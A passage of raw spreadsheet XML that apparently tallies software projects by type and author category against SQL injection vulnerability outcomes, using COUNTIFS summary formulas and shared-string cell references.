        <v>563</v>
      </c>
    </row>
    <row r="66" spans="1:11" ht="30.75">
      <c r="A66" s="6">
        <v>45141</v>
      </c>
      <c r="B66" s="2" t="s">
        <v>564</v>
      </c>
      <c r="C66" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D66" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E66">
        <v>263</v>
      </c>
      <c r="F66" t="s">
        <v>565</v>
      </c>
      <c r="G66" t="s">
        <v>421</v>
      </c>
      <c r="H66" t="s">
        <v>566</v>
      </c>
      <c r="I66" s="20" t="s">
        <v>472</v>
      </c>
      <c r="J66" s="8">
        <v>15</v>
      </c>
      <c r="K66" t="s">
        <v>567</v>
      </c>
    </row>
    <row r="67" spans="1:11" ht="30.75">
      <c r="A67" s="6">
        <v>45140</v>
      </c>
      <c r="B67" s="2" t="s">
        <v>568</v>
      </c>
      <c r="C67" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D67" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E67" s="1">
        <v>26</v>
      </c>
      <c r="F67" s="1" t="s">
        <v>227</v>
      </c>
      <c r="G67" s="7" t="s">
        <v>416</v>
      </c>
      <c r="H67" s="1" t="s">
        <v>569</v>
      </c>
      <c r="I67" s="19" t="s">
        <v>418</v>
      </c>
      <c r="J67" s="13">
        <v>90</v>
      </c>
      <c r="K67" s="9"/>
    </row>
    <row r="68" spans="1:11" ht="45.75">
      <c r="A68" s="6">
        <v>45140</v>
      </c>
      <c r="B68" s="2" t="s">
        <v>570</v>
      </c>
      <c r="C68" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D68" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E68">
        <v>86</v>
      </c>
      <c r="F68" t="s">
        <v>140</v>
      </c>
      <c r="G68" t="s">
        <v>421</v>
      </c>
      <c r="H68" t="s">
        <v>571</v>
      </c>
      <c r="I68" s="20" t="s">
        <v>513</v>
      </c>
      <c r="J68" s="8">
        <v>15</v>
      </c>
      <c r="K68" t="s">
        <v>572</v>
      </c>
    </row>
    <row r="69" spans="1:11" ht="45.75">
      <c r="A69" s="6">
        <v>45139</v>
      </c>
      <c r="B69" s="2" t="s">
        <v>573</v>
      </c>
      <c r="C69" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D69" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E69">
        <v>55</v>
      </c>
      <c r="F69" t="s">
        <v>574</v>
      </c>
      <c r="G69" t="s">
        <v>421</v>
      </c>
      <c r="H69" t="s">
        <v>575</v>
      </c>
      <c r="I69" s="20" t="s">
        <v>472</v>
      </c>
      <c r="J69" s="8" t="s">
        <v>342</v>
      </c>
      <c r="K69" s="4" t="s">
        <v>576</v>
      </c>
    </row>
    <row r="70" spans="1:11" ht="45.75">
      <c r="A70" s="6">
        <v>45139</v>
      </c>
      <c r="B70" s="2" t="s">
        <v>577</v>
      </c>
      <c r="C70" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D70" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E70" s="1">
        <v>47</v>
      </c>
      <c r="F70" s="1" t="s">
        <v>37</v>
      </c>
      <c r="G70" s="1" t="s">
        <v>421</v>
      </c>
      <c r="H70" s="1" t="s">
        <v>578</v>
      </c>
      <c r="I70" s="19" t="s">
        <v>579</v>
      </c>
      <c r="J70" s="13">
        <v>15</v>
      </c>
      <c r="K70" t="s">
        <v>580</v>
      </c>
    </row>
    <row r="71" spans="1:11" ht="45.75">
      <c r="A71" s="6">
        <v>45138</v>
      </c>
      <c r="B71" s="2" t="s">
        <v>581</v>
      </c>
      <c r="C71" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D71" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E71">
        <v>36</v>
      </c>
      <c r="F71" s="1" t="s">
        <v>582</v>
      </c>
      <c r="G71" s="7" t="s">
        <v>416</v>
      </c>
      <c r="H71" s="1" t="s">
        <v>583</v>
      </c>
      <c r="I71" s="19" t="s">
        <v>418</v>
      </c>
      <c r="J71" s="8">
        <v>105</v>
      </c>
      <c r="K71" s="5"/>
    </row>
    <row r="72" spans="1:11" ht="30.75">
      <c r="A72" s="6">
        <v>45138</v>
      </c>
      <c r="B72" s="2" t="s">
        <v>584</v>
      </c>
      <c r="C72" s="10" t="s">
        <v>459</v>
      </c>
      <c r="D72" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E72">
        <v>134</v>
      </c>
      <c r="F72" s="1" t="s">
        <v>585</v>
      </c>
      <c r="G72" s="1" t="s">
        <v>421</v>
      </c>
      <c r="H72" s="1" t="s">
        <v>586</v>
      </c>
      <c r="I72" s="19" t="s">
        <v>587</v>
      </c>
      <c r="J72" s="8">
        <v>90</v>
      </c>
      <c r="K72" s="1" t="s">
        <v>588</v>
      </c>
    </row>
    <row r="73" spans="1:11" ht="45.75">
      <c r="A73" s="6">
        <v>45135</v>
      </c>
      <c r="B73" s="2" t="s">
        <v>589</v>
      </c>
      <c r="C73" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D73" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E73">
        <v>58</v>
      </c>
      <c r="F73" t="s">
        <v>590</v>
      </c>
      <c r="G73" t="s">
        <v>421</v>
      </c>
      <c r="H73" t="s">
        <v>15</v>
      </c>
      <c r="I73" s="20" t="s">
        <v>579</v>
      </c>
      <c r="J73" s="8">
        <v>60</v>
      </c>
      <c r="K73" s="1" t="s">
        <v>591</v>
      </c>
    </row>
    <row r="74" spans="1:11" ht="30.75">
      <c r="A74" s="6">
        <v>45135</v>
      </c>
      <c r="B74" s="2" t="s">
        <v>592</v>
      </c>
      <c r="C74" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D74" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E74">
        <v>20</v>
      </c>
      <c r="F74" t="s">
        <v>593</v>
      </c>
      <c r="G74" t="s">
        <v>421</v>
      </c>
      <c r="H74" t="s">
        <v>594</v>
      </c>
      <c r="I74" s="20">
        <v>0.1</v>
      </c>
      <c r="J74" s="8">
        <v>15</v>
      </c>
      <c r="K74" s="1" t="s">
        <v>595</v>
      </c>
    </row>
    <row r="75" spans="1:11" ht="30.75">
      <c r="A75" s="6">
        <v>45135</v>
      </c>
      <c r="B75" s="2" t="s">
        <v>596</v>
      </c>
      <c r="C75" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D75" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E75">
        <v>84</v>
      </c>
      <c r="F75" t="s">
        <v>597</v>
      </c>
      <c r="G75" t="s">
        <v>421</v>
      </c>
      <c r="H75" t="s">
        <v>598</v>
      </c>
      <c r="I75" s="21" t="s">
        <v>423</v>
      </c>
      <c r="J75" s="8">
        <v>70</v>
      </c>
      <c r="K75" s="1" t="s">
        <v>599</v>
      </c>
    </row>
    <row r="76" spans="1:11" ht="45.75">
      <c r="A76" s="6">
        <v>45135</v>
      </c>
      <c r="B76" s="2" t="s">
        <v>600</v>
      </c>
      <c r="C76" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D76" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E76">
        <v>62</v>
      </c>
      <c r="F76" t="s">
        <v>601</v>
      </c>
      <c r="G76" t="s">
        <v>421</v>
      </c>
      <c r="H76" t="s">
        <v>602</v>
      </c>
      <c r="I76" s="20">
        <v>0.1</v>
      </c>
      <c r="J76" s="8" t="s">
        <v>342</v>
      </c>
      <c r="K76" s="18" t="s">
        <v>603</v>
      </c>
    </row>
    <row r="77" spans="1:11" ht="30.75">
      <c r="A77" s="6">
        <v>45135</v>
      </c>
      <c r="B77" s="2" t="s">
        <v>604</v>
      </c>
      <c r="C77" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D77" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E77">
        <v>22</v>
      </c>
      <c r="F77" t="s">
        <v>605</v>
      </c>
      <c r="G77" t="s">
        <v>421</v>
      </c>
      <c r="H77" t="s">
        <v>606</v>
      </c>
      <c r="I77" s="20">
        <v>0.01</v>
      </c>
      <c r="J77" s="8">
        <v>15</v>
      </c>
      <c r="K77" s="1" t="s">
        <v>607</v>
      </c>
    </row>
    <row r="78" spans="1:11" ht="60.75">
      <c r="A78" s="6">
        <v>45135</v>
      </c>
      <c r="B78" s="2" t="s">
        <v>608</v>
      </c>
      <c r="C78" s="11" t="s">
        <v>414</v>
      </c>
      <c r="D78" s="10" t="s">
        <v>504</v>
      </c>
      <c r="E78">
        <v>134</v>
      </c>
      <c r="F78" t="s">
        <v>609</v>
      </c>
      <c r="G78" t="s">
        <v>14</v>
      </c>
      <c r="H78" s="1" t="s">
        <v>610</v>
      </c>
      <c r="I78" s="19">
        <v>0.01</v>
      </c>
      <c r="J78" s="13">
        <v>70</v>
      </c>
      <c r="K78" s="1" t="s">
        <v>611</v>
      </c>
    </row>
    <row r="79" spans="1:11" ht="30.75">
      <c r="A79" s="6">
        <v>45134</v>
      </c>
      <c r="B79" s="2" t="s">
        <v>612</v>
      </c>
      <c r="C79" s="10" t="s">
        <v>425</v>
      </c>
      <c r="D79" s="10" t="s">
        <v>425</v>
      </c>
      <c r="F79" t="s">
        <v>425</v>
      </c>
      <c r="G79" t="s">
        <v>421</v>
      </c>
      <c r="J79" s="8">
        <v>0</v>
      </c>
      <c r="K79" t="s">
        <v>426</v>
      </c>
    </row>
    <row r="80" spans="1:11" ht="30.75">
      <c r="A80" s="6">
        <v>45134</v>
      </c>
      <c r="B80" s="2" t="s">
        <v>613</v>
      </c>
      <c r="C80" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D80" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E80">
        <v>63</v>
      </c>
      <c r="F80" t="s">
        <v>140</v>
      </c>
      <c r="G80" t="s">
        <v>421</v>
      </c>
      <c r="H80" t="s">
        <v>614</v>
      </c>
      <c r="I80" s="20">
        <v>0.25</v>
      </c>
      <c r="J80" s="8" t="s">
        <v>342</v>
      </c>
      <c r="K80" s="4" t="s">
        <v>462</v>
      </c>
    </row>
    <row r="81" spans="1:11" ht="30.75">
      <c r="A81" s="6">
        <v>45133</v>
      </c>
      <c r="B81" s="2" t="s">
        <v>615</v>
      </c>
      <c r="C81" s="10" t="s">
        <v>469</v>
      </c>
      <c r="D81" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E81">
        <v>453</v>
      </c>
      <c r="F81" t="s">
        <v>37</v>
      </c>
      <c r="G81" t="s">
        <v>421</v>
      </c>
      <c r="H81" t="s">
        <v>616</v>
      </c>
      <c r="I81" s="20">
        <v>0.05</v>
      </c>
      <c r="J81" s="8">
        <v>15</v>
      </c>
    </row>
    <row r="82" spans="1:11" ht="45.75">
      <c r="A82" s="6">
        <v>45133</v>
      </c>
      <c r="B82" s="2" t="s">
        <v>617</v>
      </c>
      <c r="C82" s="10" t="s">
        <v>414</v>
      </c>
      <c r="D82" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E82">
        <v>43</v>
      </c>
      <c r="F82" t="s">
        <v>582</v>
      </c>
      <c r="G82" s="22" t="s">
        <v>14</v>
      </c>
      <c r="H82" s="1" t="s">
        <v>618</v>
      </c>
      <c r="I82" s="19">
        <v>0</v>
      </c>
      <c r="J82" s="8">
        <v>120</v>
      </c>
      <c r="K82" s="1" t="s">
        <v>619</v>
      </c>
    </row>
    <row r="83" spans="1:11" ht="45.75">
      <c r="A83" s="6">
        <v>45133</v>
      </c>
      <c r="B83" s="2" t="s">
        <v>620</v>
      </c>
      <c r="C83" s="10" t="s">
        <v>469</v>
      </c>
      <c r="D83" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E83">
        <v>239</v>
      </c>
      <c r="F83" t="s">
        <v>621</v>
      </c>
      <c r="G83" t="s">
        <v>421</v>
      </c>
      <c r="H83" s="1" t="s">
        <v>622</v>
      </c>
      <c r="I83" s="19">
        <v>0.01</v>
      </c>
      <c r="J83" s="8">
        <v>60</v>
      </c>
      <c r="K83" s="1"/>
    </row>
    <row r="84" spans="1:11" ht="45.75">
      <c r="A84" s="6">
        <v>45132</v>
      </c>
      <c r="B84" s="2" t="s">
        <v>623</v>
      </c>
      <c r="C84" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D84" s="10" t="s">
        <v>30</v>
      </c>
      <c r="E84">
        <v>35</v>
      </c>
      <c r="F84" t="s">
        <v>624</v>
      </c>
      <c r="G84" s="22" t="s">
        <v>14</v>
      </c>
      <c r="H84" s="1" t="s">
        <v>625</v>
      </c>
      <c r="I84" s="19">
        <v>0</v>
      </c>
      <c r="J84" s="8">
        <v>90</v>
      </c>
      <c r="K84" s="1"/>
    </row>
    <row r="85" spans="1:11" ht="45.75">
      <c r="A85" s="6">
        <v>45132</v>
      </c>
      <c r="B85" s="2" t="s">
        <v>626</v>
      </c>
      <c r="C85" s="10" t="s">
        <v>627</v>
      </c>
      <c r="D85" s="10" t="s">
        <v>504</v>
      </c>
      <c r="E85">
        <v>18</v>
      </c>
      <c r="F85" t="s">
        <v>140</v>
      </c>
      <c r="G85" t="s">
        <v>14</v>
      </c>
      <c r="H85" t="s">
        <v>15</v>
      </c>
      <c r="I85" s="20">
        <v>0</v>
      </c>
      <c r="J85" s="8">
        <v>30</v>
      </c>
      <c r="K85" t="s">
        <v>628</v>
      </c>
    </row>
    <row r="86" spans="1:11" ht="45.75">
      <c r="A86" s="6">
        <v>45132</v>
      </c>
      <c r="B86" s="2" t="s">
        <v>629</v>
      </c>
      <c r="C86" s="10" t="s">
        <v>246</v>
      </c>
      <c r="D86" s="10" t="s">
        <v>405</v>
      </c>
      <c r="E86">
        <v>18</v>
      </c>
      <c r="F86" t="s">
        <v>630</v>
      </c>
      <c r="G86" t="s">
        <v>14</v>
      </c>
      <c r="H86" s="1" t="s">
        <v>631</v>
      </c>
      <c r="I86" s="19">
        <v>0</v>
      </c>
      <c r="J86" s="8">
        <v>120</v>
      </c>
      <c r="K86" t="s">
        <v>632</v>
      </c>
    </row>
    <row r="91" spans="1:11">
      <c r="F91" s="127" t="s">
        <v>6</v>
      </c>
      <c r="G91" s="127"/>
      <c r="H91" s="127"/>
      <c r="I91" s="127"/>
      <c r="J91" s="8" t="s">
        <v>633</v>
      </c>
    </row>
    <row r="92" spans="1:11">
      <c r="D92" s="11" t="s">
        <v>2</v>
      </c>
      <c r="E92" t="s">
        <v>3</v>
      </c>
      <c r="F92" t="s">
        <v>416</v>
      </c>
      <c r="G92" t="s">
        <v>544</v>
      </c>
      <c r="H92" t="s">
        <v>421</v>
      </c>
      <c r="I92" s="20" t="s">
        <v>14</v>
      </c>
    </row>
    <row r="93" spans="1:11" ht="18.75" customHeight="1">
      <c r="C93" s="129" t="s">
        <v>406</v>
      </c>
      <c r="D93" s="131" t="s">
        <v>414</v>
      </c>
      <c r="E93" t="s">
        <v>30</v>
      </c>
      <c r="F93" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Student", $F$1:$F$86, NOT("LIKE"), $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G93" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Student", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H93" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Student", $G$1:$G$86, "Did not install")</f>
        <v>1</v>
      </c>
      <c r="I93" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Student", $G$1:$G$86, "No")</f>
        <v>2</v>
      </c>
    </row>
    <row r="94" spans="1:11">
      <c r="C94" s="129"/>
      <c r="D94" s="131"/>
      <c r="E94" t="s">
        <v>504</v>
      </c>
      <c r="F94" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G94" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H94" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "Did not install")</f>
        <v>0</v>
      </c>
      <c r="I94" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "No")</f>
        <v>1</v>
      </c>
    </row>
    <row r="95" spans="1:11">
      <c r="C95" s="129"/>
      <c r="D95" s="131"/>
      <c r="E95" t="s">
        <v>405</v>
      </c>
      <c r="F95" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Professional", $F$1:$F$86, "LIKE", $G$1:$G$86, "SQL-IA")</f>
        <v>2</v>
      </c>
      <c r="G95" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H95" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Professional", $G$1:$G$86, "Did not install")</f>
        <v>23</v>
      </c>
      <c r="I95" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app", $D$1:$D$86, "Professional", $G$1:$G$86, "No")</f>
        <v>7</v>
      </c>
    </row>
    <row r="96" spans="1:11">
      <c r="C96" s="129"/>
      <c r="D96" s="131"/>
      <c r="E96" s="86" t="s">
        <v>410</v>
      </c>
      <c r="F96" s="87">
        <f ca="1">SUM(F93:F96)</f>
        <v>3</v>
      </c>
      <c r="G96" s="87">
        <f>SUM(G93:G95)</f>
        <v>0</v>
      </c>
      <c r="H96" s="87">
        <f>SUM(H93:H95)</f>
        <v>24</v>
      </c>
      <c r="I96" s="87">
        <f>SUM(I93:I95)</f>
        <v>10</v>
      </c>
      <c r="J96" s="88">
        <v>37</v>
      </c>
    </row>
    <row r="97" spans="3:12" ht="15.75" customHeight="1">
      <c r="C97" s="129"/>
      <c r="D97" s="128" t="s">
        <v>246</v>
      </c>
      <c r="E97" t="s">
        <v>30</v>
      </c>
      <c r="F97" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Student", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G97" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Student", $G$1:$G$86, "SQL-IDIA")</f>
        <v>1</v>
      </c>
      <c r="H97" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Student", $G$1:$G$86, "Did not install")</f>
        <v>3</v>
      </c>
      <c r="I97" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Student", $G$1:$G$86, "No")</f>
        <v>2</v>
      </c>
    </row>
    <row r="98" spans="3:12">
      <c r="C98" s="129"/>
      <c r="D98" s="128"/>
      <c r="E98" t="s">
        <v>504</v>
      </c>
      <c r="F98" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G98" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H98" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "Did not install")</f>
        <v>2</v>
      </c>
      <c r="I98" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Tutorial", $G$1:$G$86, "No")</f>
        <v>0</v>
      </c>
    </row>
    <row r="99" spans="3:12">
      <c r="C99" s="129"/>
      <c r="D99" s="128"/>
      <c r="E99" t="s">
        <v>405</v>
      </c>
      <c r="F99" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IA")</f>
        <v>1</v>
      </c>
      <c r="G99" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H99" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Professional", $G$1:$G$86, "Did not install")</f>
        <v>25</v>
      </c>
      <c r="I99" s="84">
        <f>COUNTIFS($C$1:$C$86, "Standalone app", $D$1:$D$86, "Professional", $G$1:$G$86, "No")</f>
        <v>3</v>
      </c>
    </row>
    <row r="100" spans="3:12">
      <c r="C100" s="129"/>
      <c r="D100" s="128"/>
      <c r="E100" s="86" t="s">
        <v>410</v>
      </c>
      <c r="F100" s="87">
        <f>SUM(F97:F99)</f>
        <v>1</v>
      </c>
      <c r="G100" s="87">
        <f>SUM(G97:G99)</f>
        <v>1</v>
      </c>
      <c r="H100" s="87">
        <f>SUM(H97:H99)</f>
        <v>30</v>
      </c>
      <c r="I100" s="88">
        <f>SUM(I97:I99)</f>
        <v>5</v>
      </c>
      <c r="J100" s="89">
        <v>37</v>
      </c>
    </row>
    <row r="101" spans="3:12" ht="29.25" customHeight="1">
      <c r="C101" s="129"/>
      <c r="D101" s="85" t="s">
        <v>469</v>
      </c>
      <c r="E101" t="s">
        <v>405</v>
      </c>
      <c r="F101" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app with server and client components", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G101" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app with server and client components", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H101" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app with server and client components", $D$1:$D$86, "Professional", $G$1:$G$86, "Did not install")</f>
        <v>3</v>
      </c>
      <c r="I101" s="84">
        <f>COUNTIFS($C$1:$C$86, "Web app with server and client components", $D$1:$D$86, "Professional", $G$1:$G$86, "No")</f>
        <v>0</v>
      </c>
      <c r="J101" s="8">
        <v>3</v>
      </c>
    </row>
    <row r="102" spans="3:12" ht="15.75" customHeight="1">
      <c r="C102" s="129"/>
      <c r="D102" s="122" t="s">
        <v>459</v>
      </c>
      <c r="E102" t="s">
        <v>405</v>
      </c>
      <c r="F102" s="84">
        <f>COUNTIFS($C$1:$C$86, "Library/Framework", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G102" s="84">
        <f>COUNTIFS($C$1:$C$86, "Library/Framework", $D$1:$D$86, "Professional", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H102" s="84">
        <f>COUNTIFS($C$1:$C$86, "Library/Framework", $D$1:$D$86, "Professional", $G$1:$G$86, "Did not install")</f>
        <v>3</v>
      </c>
      <c r="I102" s="84">
        <f>COUNTIFS($C$1:$C$86, "Library/Framework", $D$1:$D$86, "Professional", $G$1:$G$86, "Yes")</f>
        <v>0</v>
      </c>
      <c r="J102" s="8">
        <v>4</v>
      </c>
    </row>
    <row r="103" spans="3:12">
      <c r="C103" s="129"/>
      <c r="D103" s="123" t="s">
        <v>627</v>
      </c>
      <c r="E103" t="s">
        <v>504</v>
      </c>
      <c r="F103" s="84">
        <f>COUNTIFS($C$1:$C$86, "Code Snippet", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G103" s="84">
        <f>COUNTIFS($C$1:$C$86, "Code Snippet", $D$1:$D$86, "Tutorial", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H103" s="84">
        <f>COUNTIFS($C$1:$C$86, "Code Snippet", $D$1:$D$86, "Tutorial", $G$1:$G$86, "Did not install")</f>
        <v>0</v>
      </c>
      <c r="I103" s="84">
        <f>COUNTIFS($C$1:$C$86, "Code Snippet", $D$1:$D$86, "Tutorial", $G$1:$G$86, "No")</f>
        <v>1</v>
      </c>
      <c r="J103" s="8">
        <v>1</v>
      </c>
    </row>
    <row r="104" spans="3:12">
      <c r="C104" s="129"/>
      <c r="D104" s="123" t="s">
        <v>425</v>
      </c>
      <c r="E104" t="s">
        <v>425</v>
      </c>
      <c r="F104" s="84">
        <f>COUNTIFS($C$1:$C$86, "Unknown", $D$1:$D$86, "Unknown", $G$1:$G$86, "SQL-IA")</f>
        <v>0</v>
      </c>
      <c r="G104" s="84">
        <f>COUNTIFS($C$1:$C$86, "Unknown", $D$1:$D$86, "Unknown", $G$1:$G$86, "SQL-IDIA")</f>
        <v>0</v>
      </c>
      <c r="H104" s="84">
        <f>COUNTIFS($C$1:$C$86, "Unknown", $D$1:$D$86, "Unknown", $G$1:$G$86, "Did not install")</f>
        <v>2</v>
      </c>
      <c r="I104" s="84">
        <f>COUNTIFS($C$1:$C$86, "Unknown", $D$1:$D$86, "Unknown", $G$1:$G$86, "No")</f>
        <v>0</v>
      </c>
      <c r="J104" s="8">
        <v>2</v>
      </c>
    </row>
    <row r="105" spans="3:12">
      <c r="C105" s="129"/>
      <c r="D105" s="90" t="s">
        <v>410</v>
      </c>
      <c r="E105" s="91"/>
      <c r="F105" s="106">
        <v>4</v>
      </c>
      <c r="G105" s="91">
        <v>1</v>
      </c>
      <c r="H105" s="91">
        <v>69</v>
      </c>
      <c r="I105" s="92">
        <v>10</v>
      </c>
      <c r="J105" s="93">
        <f>SUM(F105:I105)</f>
        <v>84</v>
      </c>
    </row>
    <row r="106" spans="3:12">
      <c r="I106" s="83"/>
    </row>
    <row r="107" spans="3:12">
      <c r="I107" s="83"/>
    </row>
    <row r="110" spans="3:12">
      <c r="L110" t="s">
        <v>634</v>
      </c>
    </row>
    <row r="111" spans="3:12">
      <c r="C111" s="131" t="s">
        <v>635</v>
      </c>
      <c r="D111" s="131" t="s">
        <v>2</v>
      </c>
      <c r="E111" s="133" t="s">
        <v>3</v>
      </c>
      <c r="F111" s="133"/>
      <c r="G111" s="133"/>
      <c r="H111" s="131" t="s">
        <v>410</v>
      </c>
    </row>
    <row r="112" spans="3:12">
      <c r="C112" s="131"/>
      <c r="D112" s="131"/>
      <c r="E112" s="122" t="s">
        <v>30</v>
      </c>
      <c r="F112" s="122" t="s">
        <v>12</v>
      </c>
      <c r="G112" s="122" t="s">
        <v>19</v>
      </c>
      <c r="H112" s="131"/>
      <c r="K112" s="58" t="s">
        <v>5</v>
      </c>
      <c r="L112" t="s">
        <v>636</v>
      </c>
    </row>
    <row r="113" spans="3:16" ht="15" customHeight="1">
      <c r="C113" s="130" t="s">
        <v>406</v>
      </c>
      <c r="D113" s="11" t="s">
        <v>414</v>
      </c>
      <c r="E113">
        <v>1</v>
      </c>
      <c r="F113">
        <v>0</v>
      </c>
      <c r="G113">
        <v>26</v>
      </c>
      <c r="H113" s="100">
        <v>27</v>
      </c>
    </row>
    <row r="114" spans="3:16" ht="15" customHeight="1">
      <c r="C114" s="130"/>
      <c r="D114" s="11" t="s">
        <v>246</v>
      </c>
      <c r="E114">
        <v>4</v>
      </c>
      <c r="F114">
        <v>2</v>
      </c>
      <c r="G114">
        <v>21</v>
      </c>
      <c r="H114" s="100">
        <v>27</v>
      </c>
      <c r="K114" s="58" t="s">
        <v>116</v>
      </c>
      <c r="L114" s="58" t="s">
        <v>3</v>
      </c>
    </row>
    <row r="115" spans="3:16" ht="30" customHeight="1">
      <c r="C115" s="130"/>
      <c r="D115" s="98" t="s">
        <v>469</v>
      </c>
      <c r="E115">
        <v>0</v>
      </c>
      <c r="F115">
        <v>0</v>
      </c>
      <c r="G115">
        <v>2</v>
      </c>
      <c r="H115" s="100">
        <v>2</v>
      </c>
      <c r="K115" s="58" t="s">
        <v>2</v>
      </c>
      <c r="L115" t="s">
        <v>405</v>
      </c>
      <c r="M115" t="s">
        <v>30</v>
      </c>
      <c r="N115" t="s">
        <v>504</v>
      </c>
      <c r="O115" t="s">
        <v>425</v>
      </c>
      <c r="P115" t="s">
        <v>117</v>
      </c>
    </row>
    <row r="116" spans="3:16" ht="15" customHeight="1">
      <c r="C116" s="130"/>
      <c r="D116" s="11" t="s">
        <v>459</v>
      </c>
      <c r="E116">
        <v>0</v>
      </c>
      <c r="F116">
        <v>0</v>
      </c>
      <c r="G116">
        <v>3</v>
      </c>
      <c r="H116" s="100">
        <v>3</v>
      </c>
      <c r="K116" t="s">
        <v>414</v>
      </c>
      <c r="L116" s="59">
        <v>26</v>
      </c>
      <c r="M116" s="59">
        <v>1</v>
      </c>
      <c r="N116" s="59"/>
      <c r="O116" s="59"/>
      <c r="P116" s="59">
        <v>27</v>
      </c>
    </row>
    <row r="117" spans="3:16" ht="15" customHeight="1">
      <c r="C117" s="130"/>
      <c r="D117" s="11" t="s">
        <v>627</v>
      </c>
      <c r="E117">
        <v>0</v>
      </c>
      <c r="F117">
        <v>1</v>
      </c>
      <c r="G117">
        <v>0</v>
      </c>
      <c r="H117" s="100">
        <v>1</v>
      </c>
      <c r="K117" t="s">
        <v>246</v>
      </c>
      <c r="L117" s="59">
        <v>21</v>
      </c>
      <c r="M117" s="59">
        <v>4</v>
      </c>
      <c r="N117" s="59">
        <v>2</v>
      </c>
      <c r="O117" s="59"/>
      <c r="P117" s="59">
        <v>27</v>
      </c>
    </row>
    <row r="118" spans="3:16" ht="15" customHeight="1">
      <c r="C118" s="130"/>
      <c r="D118" s="11" t="s">
        <v>425</v>
      </c>
      <c r="E118">
        <v>0</v>
      </c>
      <c r="F118">
        <v>0</v>
      </c>
      <c r="G118">
        <v>2</v>
      </c>
      <c r="H118" s="100">
        <v>2</v>
      </c>
      <c r="K118" t="s">
